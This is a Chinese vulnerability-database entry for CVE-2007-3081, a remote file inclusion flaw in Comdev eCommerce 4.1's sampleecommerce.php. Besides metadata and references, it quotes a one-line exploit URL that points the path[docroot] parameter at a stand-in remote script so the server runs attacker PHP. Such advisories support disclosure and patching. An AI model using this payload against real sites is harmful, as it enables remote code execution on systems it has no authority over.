Comdev eCommerce sampleecommerce.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190322 漏洞类型 未知
发布时间 2007-06-06 更新时间 2007-06-06
CVE编号 CVE-2007-3081 CNNVD-ID CNNVD-200706-083
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86100
https://cxsecurity.com/issue/WLB-2007060042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-083
|漏洞详情
ComdeveCommerce4.1版本的sampleecommerce.php中存在PHP远程文件包含漏洞。远程攻击者可以借助path[docroot]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
########################################################################
###########################################################
#  
# Comdev eCommerce 4.1 RFI Vulnerability
#
########################################################################
###########################################################
# Infomation:-
#
# Scripts:  Comdev eCommerce
# Download: http://www.comdevweb.com/downloadfile.php?product=ECOMM41&url=http://sha
re.comdevweb.com/download/ecommerce-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# http://website/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http
://EVILSCRIPT.txt?
#
########################################################################
###########################################################
#
# Discoverd By : [L.T.C]
#
########################################################################
###########################################################
|受影响的产品
Comdev Comdev eCommerce 4.1
|参考资料

来源:XF
名称:ecommerce-sampleecommerce-file-include(34704)
链接:http://xforce.iss.net/xforce/xfdb/34704
来源:BUGTRAQ
名称:20070603ComdeveCommerce4.1RFIVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/470435/100/0/threaded
来源:SREASON
名称:2779
链接:http://securityreason.com/securityalert/2779